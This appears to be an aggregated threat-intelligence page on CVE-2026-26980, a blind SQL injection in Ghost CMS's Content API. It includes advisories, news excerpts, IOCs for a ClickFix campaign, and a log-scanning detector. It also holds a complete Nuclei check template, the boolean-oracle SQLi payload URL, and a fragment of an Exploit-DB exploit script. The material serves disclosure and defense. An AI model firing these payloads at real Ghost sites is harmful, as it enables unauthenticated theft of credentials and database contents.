CVE-2026-26980
Published: 2026-02-20
Priority: P1 · 87 · high · CVSS 3.1 7.5
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 70.00% (99.3rd percentile)
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ghost | ghost | >= 3.24.0 < 6.19.1 | 6.19.1 |
| tryghost | ghost | — | — |
Detection & IOCs (extracted from sources)
Exploit check URL (from the Nuclei template; needs the site's public Content API key and one existing tag slug): {{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]
Nuclei template:
```yaml
id: CVE-2026-26980

info:
  name: Ghost CMS Content API - SQL Injection
  author: domwhewell-sage
  severity: critical
  description: |
    Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
  impact: |
    An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.
  remediation: |
    Upgrade Ghost CMS to version 6.19.1 or later which uses parameterized queries for slug filter ordering.
  reference:
    - https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97
    - https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91
    - https://nvd.nist.gov/vuln/detail/CVE-2026-26980
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-26980
    epss-score: 0.32738
    epss-percentile: 0.96881
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: ghost
    product: ghost
    framework: node.js
    shodan-query: http.component:"Ghost"
    fofa-query: app="Ghost"
  tags: cve,cve2026,ghost,ghostcms,sqli,vuln

flow: |
  http(1) && http(2) && http(3)

http:
  - id: extract-api-key
    method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    max-redirects: 2
    extractors:
      - type: regex
        name: api_key
        part: body
        group: 1
        regex:
          - 'data-key="([a-f0-9]{20,})"'
        internal: true

  - id: extract-first-slug
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null"
    extractors:
      - type: json
        part: body
        name: first_slug
        json:
          - '.tags[0].slug'
        internal: true

  - id: check-sqli
    method: GET
    path:
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
      - "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=0 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
    matchers:
      - type: dsl
        dsl:
          - "len(body_1) != len(body_2)"
```

- Detect exploitation attempts by monitoring GET requests to /ghost/api/content/tags/ where the 'filter' parameter contains SQL injection patterns such as CASE WHEN, EXP(710), or abs(-9223372036854775808): the boolean-based blind SQLi oracle payloads used by the public PoC and Nuclei template.
- Hunt for injected JavaScript loaders at the bottom of Ghost CMS article pages that fetch second-stage code from external domains, particularly referencing clo4shara[.]xyz/11z77u3.php.
- Alert on Ghost Admin API calls (POST/PATCH to /ghost/api/admin/posts/ or /ghost/api/admin/themes/) that originate from unexpected IPs or occur outside normal publishing windows; these may indicate stolen Admin API key abuse.
- Detect ClickFix payload delivery: monitor for PowerShell processes spawned from the Windows Run dialog (explorer.exe → cmd.exe/powershell.exe) downloading DLL files and executing them via rundll32.exe.
- Hunt for the Grape/UtilifySetup Electron malware persistence path C:\Users\<user>\AppData\Local\SuperMaxionQuickMaxlite and the mutex electron.app.Grape on Windows endpoints.
- Detect C2 beaconing: look for periodic (every 30 seconds) outbound HTTP/HTTPS connections to web-telegram[.]ug from Electron-based processes (Grape.exe).
- Use Shodan query http.component:"Ghost" or FOFA query app="Ghost" to identify internet-exposed Ghost CMS instances for proactive patching and attack surface reduction.
- Maintain a 30-day record of Ghost Admin API call logs to enable retrospective investigation of unauthorized API key usage.

- The vulnerability only affects Ghost CMS versions 3.24.0 through 6.19.0; version 6.19.1 and later are patched. Rotating all previously used Admin API keys is required even after patching, as keys may have been exfiltrated.
- The cloaking script actively fingerprints visitors and serves benign content to security scanners and crawlers, meaning automated scanning of compromised pages may not reveal the injected malicious JavaScript.
- At least two distinct threat clusters are operating this campaign; some sites have been re-infected with different scripts after cleanup, or one cluster has replaced the other's injected script. A single cleanup pass may be insufficient.
CVSS provenance
- NVD (v3.1): 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- VulnCheck: 7.5 HIGH
NVD scores confidentiality impact only (C:H/I:N/A:N). The CNA vector carried by the GHSA advisory and the Nuclei template (C:H/I:H/A:L) scores 9.4, which is the figure The Hacker News and Wiz quote; the two scores describe the same bug.
VulDB
TryGhost up to 6.19.0 sql injection (GHSA-w52v-v783-gw97 / EDB-52555)
vuldb · 2026-05-27 · CVSS 7.5 · HIGH
A vulnerability has been found in TryGhost Ghost up to 6.19.0 and classified as critical. Impacted is an unknown function. This manipulation causes SQL injection.
This vulnerability is tracked as CVE-2026-26980. The attack can be carried out remotely. Moreover, an exploit is present.
The affected component should be upgraded.
OSV
Ghost has a SQL injection in Content API
osv · 2026-02-18 · CRITICAL
### Impact
A SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database.
### Vulnerable Versions
This vulnerability is present in Ghost v3.24.0 to v6.19.0.
### Patches
v6.19.1 contains a fix for this issue.
### Workarounds
There is no application-level workaround. The Content API key is public by design, so restricting key access does not mitigate this vulnerability.
As a temporary mitigation, a reverse proxy or WAF rule can be used to block Content API requests containing `slug%3A%5B` or `slug:[` in the query string filter parameter. Note that this may break legitimate slug filter functionality.
### References
We thank Nicholas Carlini using Claude, Anthropic
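The hunt note under Detection & IOCs (filter values carrying CASE WHEN, EXP(710) or abs(-9223372036854775808)) and the advisory's WAF workaround above (block `slug:[` / `slug%3A%5B` in the Content API filter parameter) reduce to the same check on the request line. The following is an added example, not code from Ghost, from the advisory or from any source quoted on this page: it parses combined-format access log lines, percent-decodes the filter parameter twice so a double-encoded payload does not slip past, and reports which rule fired. The log lines, client addresses and Content API key are constructed for the example, and it assumes the default /ghost/api/content/ prefix.

```python
"""Flag CVE-2026-26980 exploitation attempts in Ghost access logs.

Added example, not code from Ghost or from any source on this page. It implements
two rules the page describes:
  1. the advisory's WAF workaround: Content API requests whose `filter` parameter
     contains `slug:[` (or its encoded form `slug%3A%5B`);
  2. the hunt note: `filter` values carrying the boolean-oracle fragments
     CASE WHEN, EXP(710) or abs(-9223372036854775808).
Assumptions: combined log format, default /ghost/api/content/ prefix. All sample
log lines, addresses, status codes and the Content API key below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

CONTENT_API_PREFIX = "/ghost/api/content/"

# Oracle fragments named in the page's hunt note, matched after percent-decoding.
ORACLE_PATTERNS = (
    ("case_when", re.compile(r"case\s+when", re.I)),
    ("exp_710", re.compile(r"exp\s*\(\s*710\s*\)", re.I)),
    ("abs_int64_min", re.compile(r"abs\s*\(\s*-9223372036854775808\s*\)", re.I)),
)


def classify(target: str) -> dict:
    """Return which rules a request target trips.

    content_api: path is under the Content API prefix
    waf_block:   advisory's stopgap rule (`slug:[` present in filter)
    oracle:      labels of oracle fragments found in filter (empty if none)
    """
    parts = urlsplit(target)
    verdict = {
        "content_api": parts.path.startswith(CONTENT_API_PREFIX),
        "waf_block": False,
        "oracle": [],
    }
    if not verdict["content_api"]:
        return verdict
    # parse_qs decodes once; unquote_plus decodes a second time so that a
    # double-encoded slug%253A%255B still resolves to slug:[ before matching.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
        filt = unquote_plus(raw)
        if "slug:[" in filt:
            verdict["waf_block"] = True
        for label, pattern in ORACLE_PATTERNS:
            if pattern.search(filt) and label not in verdict["oracle"]:
                verdict["oracle"].append(label)
    return verdict


def scan_log(text: str) -> list:
    """Parse log lines and return one finding per request that trips a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        verdict = classify(m["target"])
        if verdict["waf_block"] or verdict["oracle"]:
            findings.append(
                {"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                 "target": m["target"], **verdict}
            )
    return findings


# Constructed sample log (not a real capture). Line 1 mirrors the Nuclei
# template's slug discovery request, lines 2-3 its two oracle requests (one raw,
# one percent-encoded), lines 4-5 legitimate Content API traffic, line 6 Admin API.
SAMPLE_LOG = """\
203.0.113.7 - - [24/May/2026:10:01:02 +0000] "GET /ghost/api/content/tags/?key=0123456789abcdef01234567&filter=slug:-null HTTP/1.1" 200 812
203.0.113.7 - - [24/May/2026:10:01:03 +0000] "GET /ghost/api/content/tags/?key=0123456789abcdef01234567&filter=slug:['||CASE%20WHEN%201=1%20THEN%200%20ELSE%20EXP(710)%20END||',getting-started] HTTP/1.1" 200 812
203.0.113.7 - - [24/May/2026:10:01:03 +0000] "GET /ghost/api/content/tags/?key=0123456789abcdef01234567&filter=slug%3A%5B%27%7C%7CCASE%20WHEN%201%3D0%20THEN%200%20ELSE%20EXP%28710%29%20END%7C%7C%27%2Cgetting-started%5D HTTP/1.1" 500 112
198.51.100.9 - - [24/May/2026:10:05:00 +0000] "GET /ghost/api/content/posts/?key=0123456789abcdef01234567&filter=tag:[news,updates] HTTP/1.1" 200 4410
198.51.100.9 - - [24/May/2026:10:05:01 +0000] "GET /ghost/api/content/posts/?key=0123456789abcdef01234567&filter=slug:[hello-world,welcome] HTTP/1.1" 200 2048
192.0.2.4 - - [24/May/2026:10:06:00 +0000] "POST /ghost/api/admin/posts/ HTTP/1.1" 201 512
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        rule = "oracle:" + ",".join(f["oracle"]) if f["oracle"] else "waf-rule-only"
        print(f'{f["ts"]} {f["ip"]} {f["status"]} {rule} {f["target"][:80]}')
```

The fifth sample line shows the caveat the advisory gives for its workaround: a legitimate `slug:[a,b]` filter trips the `slug:[` rule but carries no oracle fragment, so a blocking rule on that substring breaks real clients, while the oracle patterns alone would miss a rephrased payload. Treat the WAF rule as a stopgap until 6.19.1 is deployed, and when hunting, pair the two oracle requests from one client (the Nuclei matcher relies on the two responses differing) rather than alerting on a single hit.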
GHSA
Ghost has a SQL injection in Content API
ghsa · 2026-02-18 · CRITICAL · CWE-89
Same advisory text as the OSV entry above (GHSA-w52v-v783-gw97).
VulnCheck
ghost ghost Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck · 2026 · CVSS 7.5 · HIGH
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.
Affected: ghost ghost
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.xlab.qianxin.com/ghost-cms-mass-compromised-via-cve-2026-26980-now-fueling-clickfix-attacks/
Exploit PoC: https://vulncheck.com/xdb/dd6e9d67d76c; https://vulncheck.com/xdb/2413deb927b7
No detection rules found.
Exploit-DB
Ghost CMS 6.19.0 - SQLi
exploitdb · 2026-05-07 · CVSS 7.5 · HIGH
---
```python
# Exploit Title: Ghost CMS 6.19.0 - SQLi
# Date: 2026-03-30
# Exploit Author: Maksim Rogov
# Exploit Licence: GPL-3.0
# Software Link: https://ghost.org/
# Version: Ghost >= 3.24.0, ...
# [listing truncated in the source between the header and the method body below;
#  the imports are the ones this fragment needs, and the method returns bool]
import re
from urllib.parse import urljoin, urlparse

    try:
        if self.manual_key and self.manual_path:
            # Operator supplied the Content API key and API path explicitly
            self.api_key = self.manual_key
            self.endpoint = urljoin(self.target, self.manual_path)
            if not self.endpoint.endswith('/'):
                self.endpoint += '/'
        else:
            # Ghost's Portal script tag in the page HTML carries the public
            # Content API key (data-key) and API base URL (data-api)
            r = self.session.get(self.target, timeout=10)
            self.api_key = re.search(r'data-key="([a-f0-9]+)"', r.text).group(1)
            api_raw = re.search(r'data-api="([^"]+)"', r.text).group(1)
            path = urlparse(api_raw).path
            self.endpoint = urljoin(self.target, path)
            if not self.endpoint.endswith('/'):
                self.endpoint += '/'
        r_tags = self.session.get(f"{self.endpoint}tags/?
# [listing truncated here in the source]
```
Nuclei
Ghost CMS Content API - SQL Injection
nuclei · CVSS 7.5 · HIGH (template severity: critical)
Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
Template: reproduced in full under Detection & IOCs above.
Recorded Future
May 2026 CVE Landscape
blogs_recorded_future · 2026-06-08
## May 2026 CVE Landscape
In May 2026, Insikt Group® identified 41 high-impact vulnerabilities that should be prioritized for remediation, all of which had a Very Critical Recorded Future Risk Score. This represents an 11% increase from last month.
These vulnerabilities affected products from 20 vendors. 21 of the 41 vulnerabilities were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, 19 were surfaced through honeypot data, and one was reported by a cybersecurity vendor.
The 41 vulnerabilities in this report affected products from 20 vendors. Vercel accounted for approximately 27% of the vulnerabilities, driven by honeypot-sourced Next.js activity. The remaining exposure was concentrated across a range of enter
Checkpoint
1st June – Threat Intelligence Report
blogs_checkpoint · 2026-06-01 (tagged CVE-2026-48131 in the source)
## 1st June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 1st June, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Carnival Corporation, a global cruise line operator, has confirmed a data breach affecting nearly 6 million people after attackers used social engineering to compromise an employee account. Exposed information may include names, contact details, dates of birth, and government identification numbers.
Charter Communications, a US t
Hackernews
Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks
blogs_hackernews · 2026-05-25 · CVSS 7.5 · HIGH
## Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks
Threat actors are exploiting a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript code with an aim to fuel ClickFix attacks.
According to QiAnXin XLab, the activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost's Content API that could allow an unauthenticated attacker to read arbitrary data from the database. The security flaw was addressed in February 2026 in version 6.19.1. The vulnerability was discovered by Anthropic using Claude.
What makes the vulnera
Bleepingcomputer
Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
blogs_bleepingcomputer · 2026-05-24 · CVSS 7.5 · HIGH
## Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
By Bill Toulas
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.
CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0, and allows unauthenticated attackers to re
Hackernews
⚡ Weekly Recap: Vercel Hack, Push Fraud, QEMU Abused, New Android RATs Emerge & More
blogs_hackernews · 2026-04-20 (tagged CVE-2026-20184 in the source)
## ⚡ Weekly Recap: Vercel Hack, Push Fraud, QEMU Abused, New Android RATs Emerge & More
Monday’s recap shows the same pattern in different places. A third-party tool becomes a way in, then leads to internal access. A trusted download path is briefly swapped to deliver malware. Browser extensions act normally while pulling data and running code. Even update channels are used to push payloads. It’s not breaking systems—it’s bending trust.
There’s also a shift in how attacks run. Slower check-ins, multi-stage payloads, and more code kept in memory. Attackers lean on real tools and normal workflows instead of custom builds. Some cas
Wiz
CVE-2026-26980 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 9.4 · CRITICAL
## CVE-2026-26980: JavaScript vulnerability analysis and mitigation
Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.
Source: NVD
- Score: 7.5 (NVD), severity HIGH
- CNA score: 9.4
- Published: February 20, 2026
- Affected technologies: JavaScript, NixOS
- Has public exploit: Yes
- Has CISA KEV exploit: No (CISA KEV release date N/A, due date N/A)
- EPSS: 27.5% (96.4th percentile)
- Affected packages and libraries: ghost
- Sources: NVD; npm (severity CRITICAL, has fix, added Feb 19, 2026); Nix (severity HIGH, has fix, added Feb 24, 2026)